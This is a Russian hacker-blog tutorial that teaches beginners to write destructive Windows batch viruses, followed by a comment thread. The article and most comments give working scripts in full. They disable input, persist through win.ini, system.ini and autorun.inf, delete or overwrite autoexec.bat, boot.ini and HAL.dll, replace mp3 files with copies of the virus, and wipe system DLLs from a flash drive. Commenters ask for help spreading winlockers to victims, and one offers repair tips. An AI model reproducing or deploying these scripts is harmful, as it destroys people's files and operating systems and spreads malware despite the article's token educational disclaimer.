Привет тебе снова, юный кодер-шкодер. Если ты читал прошлую мою статью под названием "Учим ДОС", то ничего сложного тут для тебя не будет. А если не читал, то внимательно смотри комментарии. Итак, начнем. Сижу я однажды и думаю: а не накатать ли мне вирус? А так как кроме QБарсика я ничего не знал, а ДОС был моим вторым ... [Братом], а ты что подумал извращенец? :)~. ТО я решил писать вирус на нем, и оказалось это не так трудно.
Вот тело моего первого вируса
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
Объясняю популярно и по шагам:
1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим
Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать 'Вы ламер.' .Работает только в винде до 2000.
Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.
@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку :)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....[]=[_H@CKED_BY_[kas]*_"SmallPox_Vir_Org"_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls
А теперь, что-то новое.
@echo off
cls
echo Please wait, updating system...
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.
Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:
ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
" Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini
copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход
О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего ;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).
Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.
Ребята помогите А как правильно написать вир чтоб заразить главную фото в маили чтоб жертва открыла фото и слетала винда или полностью погостить машину на всегда
Комментарий от юрец
[ 4 апреля, 2012, 00:21 ]
и я хочу.killerplohoi@spaces.ru
Комментарий от ТОХА
[ 5 апреля, 2012, 01:58 ]
Я типа в первые таким занимаюсь. По этому очень прошу розкажите если я напишу вирус по вашему методу не заразит ли он мой комп, и как его потом удалить да есщё как его сохранять пишите на мыло Vorohilo.antoxa@mail.ru очень нужно знать!!!!!!!!!
Комментарий от hack
[ 5 апреля, 2012, 07:04 ]
Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________
в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe
______________________________
в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT
______________________________
готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.
Ты в конце каждой строки “>nul” не писал а без этого хоть и с “@echo off” процесс не будет скрытым!!! Так что советую поставить “>nul” и на экране не будет выходить коммандная строка “cmd”
Ой ребяты! Вам не вирусы, а анекдоты писать надо!
Во всём топике нашёл всего пару интересных, РАБОТАЮЩИХ, скриптов. В действительности, простейшими DOS операторами, сейчас уже ничего не сломать.
VBScript, JS, Delphi, вот – то что вам может пригодиться, НО это должен быть самописный, ОРИГИНАЛЬНЫЙ код, т.к. стандартные командочки вроде подмены расширения и удаления системных файлов, знают даже самые тухлые бесплатные антивирусы.
Кто действительно хочет научиться хакингу – милости прошу в бауманский Университет на курсы Light Hacking.
Теперь страждущим:
Те, кто в силу своей неопытности – всё же убил ассоциации файлов на своём компе, писаниной с данного форума – вчитайтесь в “свой” код и поправьте его в обратную сторону.
Например:
assoc .exe=.txt >nul
Поменяйте txt c exe местами.
Пускай вы просрёте свои блокнотики, зато вы сможете спокойно запустить какой-нибудь AVZ чтоб восстановить свои ассоциации.
Если “Ваш” код кишит чем-то вроде:
md c:\1
уберите это с помощью:
DEL c:\1\*.*
RD c:\1
Если “Ваш” код содержал строку удаляющую NTLDR (хотя, если мне не изменяет память – в современных системах его хрен удалишь) – вам потребуется установочный диск с виндой, но лишь для того, чтоб загрузиться в консоль восстановления и выполнить:
FIXBOOT
и
FIXMBR
После этого ваш комп должен запуститься.
Если у Вас при включении ПК загружается какая-нибудь хрень – которую вы не заказывали – в первую очередь обратите внимание на автозагрузку.
1) Пуск-Программы-Автозагрузка
2) Пуск-Выполнить-MSCONFIG-Автозагрузка
Ну и в конце (простите за оффтоп) не будте нубами, уважайте чужой труд и авторское право (это для тех кто любит копипаст) и самое главное: ПРЕДОХРАНЯЙТЕСЬ!
Пламенный привет!
Комментарий от Максим
[ 9 июня, 2012, 23:44 ]
Есть у кого вирус на Взлом компьютера! И получение полного контроля!
Комментарий от Сисадмин-шкодник
[ 21 июня, 2012, 04:34 ]
Доров, друг пакостник. Скажи, как эти вирусы работают на win XP и win7, если ты заходишь от юзера
и твои возможности ограничены? И как можно сделать,чтобы при запуске win7 не запрашивала для данной проги разрешение на внесение изменений??? Заранее спасибо.
Комментарий от Lol-men
[ 27 июня, 2012, 16:22 ]
Комментарий от Максим [ Июнь 9, 2012, 23:44 ]
Есть у кого вирус на Взлом компьютера! И получение полного контроля!
Нет, но у меня есть скрипт, после запуска которого из монитора вылезает бегемот и дрючит владельца компа в анус.
Комментарий от >>>XaKeP
[ 10 июля, 2012, 22:23 ]
Зацените))
@echo off
rundll32 keyboard,disable
Date 18.11.18
Time 18:18
rundll32 mouse,disable
echo WSHShell.Popup(“Warning,.. ВАШ ПК ЗАБЛОКИРОВАН ЗА РАСПРОСТРАНЕНИЕ ПОРНОГРАФИИ! ПРОСИМ
@echo off
rundll32 keyboard,disable
Date 18.11.18
Time 18:18
rundll32 mouse,disable
echo WSHShell.Popup(“Warning,.. ВАШ ПК ЗАБЛОКИРОВАН ЗА РАСПРОСТРАНЕНИЕ ПОРНОГРАФИИ! ПРОСИМ
Здравствуйте все кто любит по прикалываться над своими друзьями и уничтожить win своих врагов! :D
я еще НОВИЧОК в BATname и подскажите пожалуйста правильно ли я написал вроде простейший ВИР!
@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
clc
ОН должен просто отключить клаву и мышь? И после перезагрузки ПК все будет норм?
Комментарий от ильдар
[ 21 августа, 2012, 00:20 ]
помогите чтобы мой винлок запускался автоматом с виндой в автозагрузку к себе гидать это глупо допустим я комуто скинул чтобы он в виндой запускался
Комментарий от htSoldier
[ 9 сентября, 2012, 13:43 ]
@echo off
cls
del %systemroot%\system32\HAL.dll /q
Комментарий от Язик
[ 17 сентября, 2012, 23:28 ]
Народ, помогите. Юзанул на пк этот вирус – тот который самый первый, теперь не могу вылечить, что делать ?
срочно народ пишете на https://vk.com/xbox_elite
Комментарий от Илья
[ 7 октября, 2012, 19:36 ]
Всем привет я специалист в BAT
Могу вам придложить это
md 1389233123
md 13761ё2ё12
md 13422222222
md Удоление
md 13lox
md 13Lox
md 133423324
md 133424
md 13124
md 133421
md 131213412
md 1331234
md 132234
md 13342134
md 13124
md 1323
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
start echo Идёт обновление подождите…
start pause
start logoff
Короче он немного зарожает создоёт много папок и выходит из системы
Можно пробовать на своём я пробывал всё ок!!
Это не сильный оброзец но хирачит прелично!
Ждите новоги сильного
Создоём новый который снисёт винду и больше её не устоновит
Всем пока
Комментарий от tuZ~XaKeR
[ 17 ноября, 2012, 22:30 ]
хДД очень угорал над комментом Ильи , насчет специалиста в bat , такие команды каждый школьник.У кого есть вопросы насчет команд или маскировки bat пишите в вк https://vk.com/tuz_pro или в skype djandre_vip
Комментарий от аенто
[ 3 декабря, 2012, 23:19 ]
парни привет как можно сделать так что б батник находящийся на флешке, с копировался в автозагрузку автоматически после того как я ее вставлю в комп
Комментарий от аенто
[ 3 декабря, 2012, 23:20 ]
пожалуйста ответь мне очень нужно знать на мыло
Комментарий от Михаил
[ 8 декабря, 2012, 14:34 ]
У меня ни каким макаром не сохраняются .bat файлы стоит винда xp. Че делать скажите плиз?????Либо здесь в коментах либо на мыло mihail.alex2000@yandex.ru
ПЛИЗЗЗЗЗ!!!!!
Написать комментарий